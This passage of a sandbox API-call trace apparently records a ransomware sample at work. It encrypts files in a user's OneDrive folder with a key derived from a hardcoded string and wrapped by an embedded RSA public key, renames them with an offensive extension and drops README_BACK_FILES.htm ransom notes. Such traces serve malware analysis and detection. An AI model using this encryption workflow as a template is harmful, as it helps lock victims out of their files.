lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.926] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.926] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.926] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.926] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0xd0, lpOverlapped=0x0) returned 1 [0280.926] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0xd0, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0xe0) returned 1 [0280.926] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0xe0, lpOverlapped=0x0) returned 1 [0280.926] CloseHandle (hObject=0x5d4c) returned 1 [0280.926] CloseHandle (hObject=0x5d68) returned 1 [0280.926] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mi-nz\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mi-nz\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mi-nz\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mi-nz\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0280.932] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mi-nz\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0280.933] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mi-nz\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mi-nz\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0280.935] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mi-nz\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mi-nz\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mi-nz\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mi-nz\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0280.937] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0280.937] CryptDestroyKey (hKey=0x2fc688) returned 1 [0280.937] CryptReleaseContext (hProv=0x2f1eee8, dwFlags=0x0) returned 1 [0280.937] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0280.937] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0280.937] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mi-nz\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mi-nz\\readme_back_files.htm")) returned 0xffffffff [0280.937] AreFileApisANSI () returned 1 [0280.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0280.938] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mi-nz\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mi-nz\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0280.939] GetFileType (hFile=0x5d3c) returned 0x1 [0280.939] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0280.940] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0280.940] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mk\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0280.940] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0280.940] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0280.940] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0280.941] GetLastError () returned 0x0 [0280.941] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mk\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mk\\filesync.localizedresources.dll.mui")) returned 0x20 [0280.941] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mk\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0280.941] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mk\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mk\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d68 [0280.942] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mk\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mk\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0280.943] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mk\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0280.944] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f1ecc8) returned 1 [0280.948] CryptCreateHash (in: hProv=0x2f1ecc8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0280.948] lstrlenA (lpString="OJqEEUaHrEmqTOCUsZRXkTNKzMlQm") returned 29 [0280.948] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0280.948] CryptDeriveKey (in: hProv=0x2f1ecc8, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fc308) returned 1 [0280.948] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0280.948] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0280.948] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1e338) returned 1 [0280.949] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1e338, dwCertEncodingType=0x1, pInfo=0x2f37710*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f37740*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f37748*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc288) returned 1 [0280.949] CryptEncrypt (in: hKey=0x2fc288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0280.949] CryptEncrypt (in: hKey=0x2fc288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1e800*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1e800*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0280.949] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f1e800*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1e800*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0280.950] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.952] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.952] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.956] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.956] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.956] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.956] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.956] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.956] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.956] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.956] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.956] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.957] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.965] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.965] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.966] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.966] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.966] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.966] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.966] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.966] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.966] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.966] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.966] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.966] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.967] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.967] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.967] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.967] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.967] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.967] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.967] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.967] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.967] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.967] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.967] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.967] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.968] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.968] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.968] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.968] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.968] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.968] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.968] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.968] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.968] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.968] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.969] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.969] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.969] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.969] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.969] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.969] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.969] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.969] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.969] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.969] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.970] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, 